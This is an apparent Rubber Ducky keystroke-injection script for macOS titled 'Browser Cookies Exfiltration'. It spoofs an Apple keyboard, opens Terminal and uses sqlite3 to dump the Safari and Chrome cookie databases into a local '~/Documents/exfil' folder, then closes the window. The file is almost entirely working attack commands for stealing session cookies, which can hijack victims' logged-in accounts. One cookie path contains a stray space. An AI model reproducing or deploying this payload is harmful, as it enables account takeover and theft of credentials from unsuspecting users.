REM Author: Generated
REM Title: Browser Cookies Exfiltration
REM Target: macOS
REM Version: 1.0
REM Category: Credentials
REM ---
DELAY 1000
REM Export browser cookies from Safari and Chrome
REM Saves to ~/Documents/exfil/cookies.txt
REM ID 05ac:021e Apple:Keyboard
DELAY 1000
GUI SPACE
DELAY 500
STRING terminal
DELAY 500
ENTER
DELAY 1000
STRING mkdir -p ~/Documents/exfil
ENTER
DELAY 500
STRING sqlite3 ~/Library/Cookies/com.apple.Safari cookies.db "SELECT * FROM cookies;" > ~/Documents/exfil/safari_cookies.txt 2>/dev/null || echo 'Safari cookies unavailable' > ~/Documents/exfil/safari_cookies.txt
ENTER
DELAY 500
STRING sqlite3 ~/Library/Application\ Support/Google/Chrome/Default/Cookies "SELECT * FROM cookies;" > ~/Documents/exfil/chrome_cookies.txt 2>/dev/null || echo 'Chrome cookies unavailable' > ~/Documents/exfil/chrome_cookies.txt
ENTER
DELAY 1000
STRING echo 'Cookies exported' && ls -la ~/Documents/exfil/
ENTER
DELAY 1000
GUI w
